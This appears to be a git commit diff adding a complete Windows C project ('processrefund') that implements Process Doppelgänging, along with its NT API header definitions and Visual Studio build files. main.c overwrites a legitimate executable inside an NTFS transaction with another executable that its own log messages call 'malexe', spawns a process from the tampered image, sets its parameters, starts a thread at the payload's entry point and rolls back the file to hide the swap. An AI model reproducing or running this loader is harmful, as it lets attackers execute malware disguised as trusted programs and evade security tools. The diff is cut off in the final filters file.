updates and moves

n/a
2026-06-16 15:59:24 +00:00 · 2022-04-11 20:00:13 -05:00
parent 1275ea2e03
commit 900263ea6f
809 changed files with 149115 additions and 1594 deletions
@@ -0,0 +1,344 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <Windows.h>
+#include <KtmW32.h>
+#include <lmerr.h>
+#include <winternl.h>
+#include <psapi.h>
+#include <Processthreadsapi.h>
+#include "ntdefs.h"
+
+// To ensure correct resolution of symbols, add Psapi.lib to TARGETLIBS
+#pragma comment(lib, "psapi.lib")
+
+
+void
+DisplayErrorText(
+	DWORD dwLastError
+)
+{
+	HMODULE hModule = NULL; // default to system source
+	LPSTR MessageBuffer;
+	DWORD dwBufferLength;
+
+	DWORD dwFormatFlags = FORMAT_MESSAGE_ALLOCATE_BUFFER |
+		FORMAT_MESSAGE_IGNORE_INSERTS |
+		FORMAT_MESSAGE_FROM_SYSTEM;
+
+	//
+	// If dwLastError is in the network range, 
+	//  load the message source.
+	//
+
+	if (dwLastError >= NERR_BASE && dwLastError <= MAX_NERR) {
+		hModule = LoadLibraryEx(
+			TEXT("netmsg.dll"),
+			NULL,
+			LOAD_LIBRARY_AS_DATAFILE
+		);
+
+		if (hModule != NULL)
+			dwFormatFlags |= FORMAT_MESSAGE_FROM_HMODULE;
+	}
+
+	//
+	// Call FormatMessage() to allow for message 
+	//  text to be acquired from the system 
+	//  or from the supplied module handle.
+	//
+
+	if (dwBufferLength = FormatMessageA(
+		dwFormatFlags,
+		hModule, // module to get message from (NULL == system)
+		dwLastError,
+		MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // default language
+		(LPSTR)&MessageBuffer,
+		0,
+		NULL
+	))
+	{
+		DWORD dwBytesWritten;
+
+		//
+		// Output message string on stderr.
+		//
+		WriteFile(
+			GetStdHandle(STD_ERROR_HANDLE),
+			MessageBuffer,
+			dwBufferLength,
+			&dwBytesWritten,
+			NULL
+		);
+
+		//
+		// Free the buffer allocated by the system.
+		//
+		LocalFree(MessageBuffer);
+	}
+
+	//
+	// If we loaded a message source, unload it.
+	//
+	if (hModule != NULL)
+		FreeLibrary(hModule);
+}
+
+LPVOID GetBaseAddressByName(HANDLE hProcess, char *module)
+{
+	MEMORY_BASIC_INFORMATION    mbi;
+	SYSTEM_INFO si;
+	LPVOID lpMem;
+	char moduleName[MAX_PATH] = { 0 };
+	/* Get maximum address range from system info */
+	GetSystemInfo(&si);
+	/* walk process addresses */
+	lpMem = 0;
+	while (lpMem < si.lpMaximumApplicationAddress) {
+		VirtualQueryEx(hProcess, lpMem, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
+		GetMappedFileName(hProcess, mbi.BaseAddress, moduleName, MAX_PATH);
+
+		if (strstr(moduleName,module))//mbi.Type & MEM_IMAGE)
+			return mbi.BaseAddress;
+		/* increment lpMem to next region of memory */
+		lpMem = (LPVOID)((ULONGLONG)mbi.BaseAddress +(ULONGLONG)mbi.RegionSize);
+			
+	}
+	return NULL;
+}
+
+int main(int argc,char *argv[] )
+{
+
+	LARGE_INTEGER liFileSize;
+	DWORD dwFileSize;
+	HANDLE hSection;
+	NTSTATUS ret;
+	
+	UNICODE_STRING  string;
+	if (argc < 3) {
+		printf("%s <exe to Doppelgang> <your exe>",argv[0]);
+		return 0;
+	}
+	HMODULE hNtdll = GetModuleHandle("ntdll.dll");
+	if (NULL==hNtdll)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got ntdll.dll at 0x%llx\n", hNtdll);
+	NtCreateSection createSection = (NtCreateSection)GetProcAddress(hNtdll, "NtCreateSection");
+	
+	if (NULL == createSection)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got NtCreateSection at 0x%08p\n", createSection);
+	WCHAR temp[MAX_PATH] = { 0 };
+	char fileFullPath[MAX_PATH] = { 0 };
+
+	GetFullPathName(argv[1], MAX_PATH, fileFullPath, NULL);
+	MultiByteToWideChar(CP_UTF8, 0, fileFullPath, strlen(fileFullPath), temp, MAX_PATH);
+	HANDLE hTransaction = CreateTransaction(NULL,0,0,0,0,0, temp);
+	if (INVALID_HANDLE_VALUE == hTransaction)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Created a transaction, handle 0x%x\n", hTransaction);
+
+	HANDLE hTransactedFile = CreateFileTransacted(fileFullPath,
+		GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL, hTransaction, NULL, NULL);
+	if (INVALID_HANDLE_VALUE == hTransactedFile)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] CreateFileTransacted on %s, handle 0x%x\n", fileFullPath, hTransactedFile);
+
+	HANDLE hExe = CreateFile(argv[2],
+		 GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+	if (INVALID_HANDLE_VALUE == hExe)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] opened malexe.exe, handle 0x%x\n", hExe);
+
+	BOOL err = GetFileSizeEx(hExe, &liFileSize);
+	if (FALSE == err)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	dwFileSize = liFileSize.LowPart;
+	printf("[+] malexe size is 0x%x\n", dwFileSize);
+
+	BYTE *buffer = malloc(dwFileSize);
+	if (NULL == buffer)
+	{
+		printf("Malloc failed\n");
+		return -1;
+	}
+	printf("[+] allocated 0x%x bytes\n", dwFileSize);
+	DWORD read = 0;
+	if (FALSE == ReadFile(hExe, buffer, dwFileSize, &read, NULL))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] read malexe.exe to buffer\n");
+
+	DWORD wrote = 0;
+	if (FALSE == WriteFile(hTransactedFile, buffer, dwFileSize, &wrote, NULL))
+
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] over wrote %s in transcation\n", fileFullPath);
+
+	ret = createSection(&hSection, SECTION_ALL_ACCESS, NULL, 0, PAGE_READONLY, SEC_IMAGE, hTransactedFile);
+	if(FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] created a section with our new malicious %s\n", fileFullPath);
+
+
+
+	NtCreateProcessEx createProcessEx = (NtCreateProcessEx)GetProcAddress(hNtdll, "NtCreateProcessEx");
+	if (NULL == createProcessEx)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got NtCreateProcessEx 0x%08p\n", createProcessEx);
+
+	HANDLE hProcess=0;
+	my_RtlInitUnicodeString initUnicodeString = (my_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
+
+	initUnicodeString(&string, temp);
+
+	ret = createProcessEx(&hProcess, GENERIC_ALL,NULL, GetCurrentProcess(), PS_INHERIT_HANDLES, hSection, NULL, NULL, FALSE);
+	
+	printf("[+] Created our process, handle 0x%x\n", hProcess);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+
+	PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)buffer;
+
+	PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(buffer + dos_header->e_lfanew);
+
+	ULONGLONG oep = ntHeader->OptionalHeader.AddressOfEntryPoint;
+
+	oep+=(ULONGLONG)GetBaseAddressByName(hProcess,argv[1]);
+
+
+	printf("[+] our new process oep is 0x%llx\n", oep);
+	NtCreateThreadEx createThreadEx = (NtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
+	if (NULL == createThreadEx)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got NtCreateThreadEx 0x%08p\n", createThreadEx);
+
+
+	my_PRTL_USER_PROCESS_PARAMETERS ProcessParams = 0;
+	RtlCreateProcessParametersEx createProcessParametersEx = (RtlCreateProcessParametersEx)GetProcAddress(hNtdll, "RtlCreateProcessParametersEx");
+	if (NULL == createProcessParametersEx)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got RtlCreateProcessParametersEx 0x%08p\n", createProcessParametersEx);
+
+
+
+	
+	ret = createProcessParametersEx(&ProcessParams, &string,NULL,NULL,&string,NULL,NULL,NULL,NULL,NULL, RTL_USER_PROC_PARAMS_NORMALIZED);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] creating Process Parameters at 0x%p\n", ProcessParams);
+
+	LPVOID RemoteProcessParams;
+	RemoteProcessParams = VirtualAllocEx(hProcess, ProcessParams, (ULONGLONG)ProcessParams&0xffff + ProcessParams->EnvironmentSize + ProcessParams->MaximumLength, MEM_COMMIT | MEM_RESERVE,PAGE_READWRITE);
+	if(NULL == RemoteProcessParams)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] creating memory at process for our paramters 0x%08x\n", RemoteProcessParams);
+
+	ret=WriteProcessMemory(hProcess, ProcessParams, ProcessParams, ProcessParams->EnvironmentSize + ProcessParams->MaximumLength,NULL);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] writing our paramters to the process\n");
+
+	my_NtQueryInformationProcess queryInformationProcess = (my_NtQueryInformationProcess)GetProcAddress(hNtdll, "NtQueryInformationProcess");
+	if (NULL == queryInformationProcess)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got NtQueryInformationProcess 0x%08p\n", queryInformationProcess);
+
+	PROCESS_BASIC_INFORMATION info;
+
+	ret = queryInformationProcess(
+		hProcess,
+		ProcessBasicInformation,
+		&info,
+		sizeof(info),
+		0);
+
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+
+	PEB *peb = info.PebBaseAddress;
+
+	ret=WriteProcessMemory(hProcess, &peb->ProcessParameters, &ProcessParams, sizeof(LPVOID), NULL);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] writing our paramters to the process peb 0x%08p\n", peb);
+
+	HANDLE hThread;
+	ret = createThreadEx(&hThread, GENERIC_ALL, NULL, hProcess, (LPTHREAD_START_ROUTINE)oep, NULL, FALSE, 0, 0, 0, NULL);
+	printf("[+] Thread created with handle %x\n", hThread);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	if (FALSE == RollbackTransaction(hTransaction))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] rolling back the original %s\n", fileFullPath);
+
+	CloseHandle(hProcess);
+	CloseHandle(hExe);
+	CloseHandle(hTransactedFile);
+	CloseHandle(hTransaction);
+
+    getchar();
+	return 0;
+}
@@ -0,0 +1,339 @@
+#pragma once
+#include <Windows.h>
+#include <KtmW32.h>
+#include <lmerr.h>
+#include <winternl.h>
+
+#define RTL_MAX_DRIVE_LETTERS   32
+#define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
+
+typedef struct _UNICODE_STRING_DWORD64
+{
+	WORD Length;
+	WORD MaximumLength;
+	DWORD64 Buffer;
+} UNICODE_STRING64, STRING64, *PSTRING64;
+
+struct _LIST_ENTRY_DWORD64
+{
+	DWORD64 Flink;
+	DWORD64 Blink;
+};
+
+typedef struct _CURDIR_64
+{
+	UNICODE_STRING64 DosPath;
+	UINT64 Handle;
+} CURDIR64, *PCURDIR64;
+typedef struct _RTL_DRIVE_LETTER_CURDIR_64
+{
+	WORD Flags;
+	WORD Length;
+	ULONG TimeStamp;
+	STRING64 DosPath;
+} RTL_DRIVE_LETTER_CURDIR64, *PRTL_DRIVE_LETTER_CURDIR64;
+typedef struct _RTL_USER_PROCESS_PARAMETERS_64
+{
+	ULONG MaximumLength;
+	ULONG Length;
+	ULONG Flags;
+	ULONG DebugFlags;
+	UINT64 ConsoleHandle;
+	ULONG ConsoleFlags;
+	UINT64 StandardInput;
+	UINT64 StandardOutput;
+	UINT64 StandardError;
+	CURDIR64 CurrentDirectory;
+	UNICODE_STRING64 DllPath;
+	UNICODE_STRING64 ImagePathName;
+	UNICODE_STRING64 CommandLine;
+	UINT64 Environment;
+	ULONG StartingX;
+	ULONG StartingY;
+	ULONG CountX;
+	ULONG CountY;
+	ULONG CountCharsX;
+	ULONG CountCharsY;
+	ULONG FillAttribute;
+	ULONG WindowFlags;
+	ULONG ShowWindowFlags;
+	UNICODE_STRING64 WindowTitle;
+	UNICODE_STRING64 DesktopInfo;
+	UNICODE_STRING64 ShellInfo;
+	UNICODE_STRING64 RuntimeData;
+	RTL_DRIVE_LETTER_CURDIR64 CurrentDirectores[32];
+	ULONG EnvironmentSize;
+} RTL_USER_PROCESS_PARAMETERS64, *PRTL_USER_PROCESS_PARAMETERS64;
+
+
+typedef struct _CURDIR
+{
+	UNICODE_STRING DosPath;
+	HANDLE Handle;
+} CURDIR, *PCURDIR;
+typedef struct _RTL_DRIVE_LETTER_CURDIR
+{
+	USHORT Flags;
+	USHORT Length;
+	ULONG TimeStamp;
+	UNICODE_STRING DosPath;
+} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
+
+typedef struct my_RTL_USER_PROCESS_PARAMETERS
+{
+	ULONG MaximumLength;
+	ULONG Length;
+
+	ULONG Flags;
+	ULONG DebugFlags;
+
+	HANDLE ConsoleHandle;
+	ULONG ConsoleFlags;
+	HANDLE StandardInput;
+	HANDLE StandardOutput;
+	HANDLE StandardError;
+
+	CURDIR CurrentDirectory;
+	UNICODE_STRING DllPath;
+	UNICODE_STRING ImagePathName;
+	UNICODE_STRING CommandLine;
+	PVOID Environment;
+
+	ULONG StartingX;
+	ULONG StartingY;
+	ULONG CountX;
+	ULONG CountY;
+	ULONG CountCharsX;
+	ULONG CountCharsY;
+	ULONG FillAttribute;
+
+	ULONG WindowFlags;
+	ULONG ShowWindowFlags;
+	UNICODE_STRING WindowTitle;
+	UNICODE_STRING DesktopInfo;
+	UNICODE_STRING ShellInfo;
+	UNICODE_STRING RuntimeData;
+	RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
+
+	ULONG_PTR EnvironmentSize;
+	ULONG_PTR EnvironmentVersion;
+	PVOID PackageDependencyData;
+	ULONG ProcessGroupId;
+	ULONG LoaderThreads;
+} my_RTL_USER_PROCESS_PARAMETERS, *my_PRTL_USER_PROCESS_PARAMETERS;
+
+typedef struct _PROCESS_BASIC_INFORMATION64 {
+	NTSTATUS ExitStatus;
+	UINT32 Reserved0;
+	UINT64 PebBaseAddress;
+	UINT64 AffinityMask;
+	UINT32 BasePriority;
+	UINT32 Reserved1;
+	UINT64 UniqueProcessId;
+	UINT64 InheritedFromUniqueProcessId;
+} PROCESS_BASIC_INFORMATION64;
+typedef struct _PEB64
+{
+
+	union
+	{
+		struct
+		{
+			BYTE InheritedAddressSpace;
+			BYTE ReadImageFileExecOptions;
+			BYTE BeingDebugged;
+			BYTE BitField;
+		};
+		DWORD64 dummy01;
+	};
+	DWORD64 Mutant;
+	 DWORD64 ImageBaseAddress;
+	 DWORD64 Ldr;
+	 DWORD64 ProcessParameters;
+	 DWORD64 SubSystemData;
+	 DWORD64 ProcessHeap;
+	 DWORD64 FastPebLock;
+	 DWORD64 AtlThunkSListPtr;
+	 DWORD64 IFEOKey;
+	 DWORD64 CrossProcessFlags;
+	 DWORD64 UserSharedInfoPtr;
+	DWORD SystemReserved;
+	DWORD AtlThunkSListPtr32;
+	 DWORD64 ApiSetMap;
+	 DWORD64 TlsExpansionCounter;
+	 DWORD64 TlsBitmap;
+	DWORD TlsBitmapBits[2];
+	 DWORD64 ReadOnlySharedMemoryBase;
+	 DWORD64 HotpatchInformation;
+	 DWORD64 ReadOnlyStaticServerData;
+	 DWORD64 AnsiCodePageData;
+	 DWORD64 OemCodePageData;
+	 DWORD64 UnicodeCaseTableData;
+	DWORD NumberOfProcessors;
+	union
+	{
+		DWORD NtGlobalFlag;
+		DWORD dummy02;
+	};
+	LARGE_INTEGER CriticalSectionTimeout;
+	 DWORD64 HeapSegmentReserve;
+	 DWORD64 HeapSegmentCommit;
+	 DWORD64 HeapDeCommitTotalFreeThreshold;
+	 DWORD64 HeapDeCommitFreeBlockThreshold;
+	DWORD NumberOfHeaps;
+	DWORD MaximumNumberOfHeaps;
+	 DWORD64 ProcessHeaps;
+	 DWORD64 GdiSharedHandleTable;
+	 DWORD64 ProcessStarterHelper;
+	 DWORD64 GdiDCAttributeList;
+	 DWORD64 LoaderLock;
+	DWORD OSMajorVersion;
+	DWORD OSMinorVersion;
+	WORD OSBuildNumber;
+	WORD OSCSDVersion;
+	DWORD OSPlatformId;
+	DWORD ImageSubsystem;
+	DWORD ImageSubsystemMajorVersion;
+	 DWORD64 ImageSubsystemMinorVersion;
+	 DWORD64 ActiveProcessAffinityMask;
+	 DWORD64 GdiHandleBuffer[30];
+	 DWORD64 PostProcessInitRoutine;
+	 DWORD64 TlsExpansionBitmap;
+	DWORD TlsExpansionBitmapBits[32];
+	 DWORD64 SessionId;
+	ULARGE_INTEGER AppCompatFlags;
+	ULARGE_INTEGER AppCompatFlagsUser;
+	 DWORD64 pShimData;
+	 DWORD64 AppCompatInfo;
+	 struct _UNICODE_STRING_DWORD64 CSDVersion;
+	 DWORD64 ActivationContextData;
+	 DWORD64 ProcessAssemblyStorageMap;
+	 DWORD64 SystemDefaultActivationContextData;
+	 DWORD64 SystemAssemblyStorageMap;
+	 DWORD64 MinimumStackCommit;
+	 DWORD64 FlsCallback;
+	 struct _LIST_ENTRY_DWORD64 FlsListHead;
+	 DWORD64 FlsBitmap;
+	DWORD FlsBitmapBits[4];
+	 DWORD64 FlsHighIndex;
+	 DWORD64 WerRegistrationData;
+	 DWORD64 WerShipAssertPtr;
+	 DWORD64 pContextData;
+	 DWORD64 pImageHeaderHash;
+	 DWORD64 TracingFlags;
+	 DWORD64 CsrServerReadOnlySharedMemoryBase;
+} PEB64;
+
+
+
+
+
+
+typedef
+NTSTATUS(WINAPI *pfnNtWow64QueryInformationProcess64)
+(HANDLE ProcessHandle, UINT32 ProcessInformationClass,
+	PVOID ProcessInformation, UINT32 ProcessInformationLength,
+	UINT32* ReturnLength);
+
+typedef
+NTSTATUS(WINAPI *pfnNtWow64ReadVirtualMemory64)
+(HANDLE ProcessHandle, PVOID64 BaseAddress,
+	PVOID BufferData, UINT64 BufferLength,
+	PUINT64 ReturnLength);
+
+typedef
+NTSTATUS(WINAPI *pfnNtQueryInformationProcess)
+(HANDLE ProcessHandle, ULONG ProcessInformationClass,
+	PVOID ProcessInformation, UINT32 ProcessInformationLength,
+	UINT32* ReturnLength);
+typedef  NTSTATUS(NTAPI *NtResumeThread)(
+	_In_ HANDLE               ThreadHandle,
+	_Out_opt_ PULONG              SuspendCount
+	);
+
+typedef NTSTATUS(NTAPI *my_NtQueryInformationProcess)(
+	IN HANDLE ProcessHandle,
+	IN PROCESSINFOCLASS ProcessInformationClass,
+	OUT PVOID ProcessInformation,
+	IN ULONG ProcessInformationLength,
+	OUT PULONG ReturnLength OPTIONAL
+	);
+typedef NTSTATUS(NTAPI *my_NtWow64QueryInformationProcess64)
+(
+	IN  HANDLE ProcessHandle,
+	IN  ULONG  ProcessInformationClass,
+	OUT PVOID  ProcessInformation64,
+	IN  ULONG  Length,
+	OUT PULONG ReturnLength OPTIONAL
+	);
+
+typedef NTSTATUS(NTAPI *RtlCreateProcessParametersEx)(
+	_Out_ my_PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
+	_In_ PUNICODE_STRING ImagePathName,
+	_In_opt_ PUNICODE_STRING DllPath,
+	_In_opt_ PUNICODE_STRING CurrentDirectory,
+	_In_opt_ PUNICODE_STRING CommandLine,
+	_In_opt_ PVOID Environment,
+	_In_opt_ PUNICODE_STRING WindowTitle,
+	_In_opt_ PUNICODE_STRING DesktopInfo,
+	_In_opt_ PUNICODE_STRING ShellInfo,
+	_In_opt_ PUNICODE_STRING RuntimeData,
+	_In_ ULONG Flags // pass RTL_USER_PROC_PARAMS_NORMALIZED to keep parameters normalized
+	);
+
+typedef NTSTATUS(NTAPI *NtCreateThreadEx)(
+	OUT PHANDLE hThread,
+	IN ACCESS_MASK DesiredAccess,
+	IN LPVOID ObjectAttributes,
+	IN HANDLE ProcessHandle,
+	IN LPTHREAD_START_ROUTINE lpStartAddress,
+	IN LPVOID lpParameter,
+	IN BOOL CreateSuspended,
+	IN DWORD StackZeroBits,
+	IN DWORD SizeOfStackCommit,
+	IN DWORD SizeOfStackReserve,
+	OUT LPVOID lpBytesBuffer
+	);
+
+
+typedef NTSTATUS(NTAPI *NtCreateSection)(
+	_Out_    PHANDLE            SectionHandle,
+	_In_     ACCESS_MASK        DesiredAccess,
+	_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_opt_ PLARGE_INTEGER     MaximumSize,
+	_In_     ULONG              SectionPageProtection,
+	_In_     ULONG              AllocationAttributes,
+	_In_opt_ HANDLE             FileHandle
+	);
+
+
+typedef NTSTATUS(NTAPI *NtCreateProcessEx)
+(
+	OUT PHANDLE     ProcessHandle,
+	IN ACCESS_MASK  DesiredAccess,
+	IN POBJECT_ATTRIBUTES ObjectAttributes  OPTIONAL,
+	IN HANDLE   ParentProcess,
+	IN ULONG    Flags,
+	IN HANDLE SectionHandle     OPTIONAL,
+	IN HANDLE DebugPort     OPTIONAL,
+	IN HANDLE ExceptionPort     OPTIONAL,
+	IN BOOLEAN  InJob
+	);
+typedef VOID (NTAPI *my_RtlInitUnicodeString)(
+	_Out_    PUNICODE_STRING DestinationString,
+	_In_opt_ PCWSTR          SourceString
+);
+typedef POBJECT_ATTRIBUTES(NTAPI *BaseFormatObjectAttributes)(OUT POBJECT_ATTRIBUTES ObjectAttributes,
+	IN PSECURITY_ATTRIBUTES SecurityAttributes OPTIONAL,
+	IN PUNICODE_STRING ObjectName,
+	OUT PDWORD NumberOfBytes);
+
+//
+// NtCreateProcessEx flags
+//
+#define PS_REQUEST_BREAKAWAY                     1
+#define PS_NO_DEBUG_INHERIT                     2
+#define PS_INHERIT_HANDLES                      4
+#define PS_UNKNOWN_VALUE                        8
+#define PS_ALL_FLAGS PS_REQUEST_BREAKAWAY |PS_NO_DEBUG_INHERIT |PS_INHERIT_HANDLES | PS_UNKNOWN_VALUE
+
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{DA9D5E53-6160-4B44-A770-903C8C4C621D}</ProjectGuid>
+    <RootNamespace>processrefund</RootNamespace>
+    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;KtmW32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>false</DataExecutionPrevention>
+      <FullProgramDatabaseFile>true</FullProgramDatabaseFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;ktmw32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="main.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="ntdefs.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
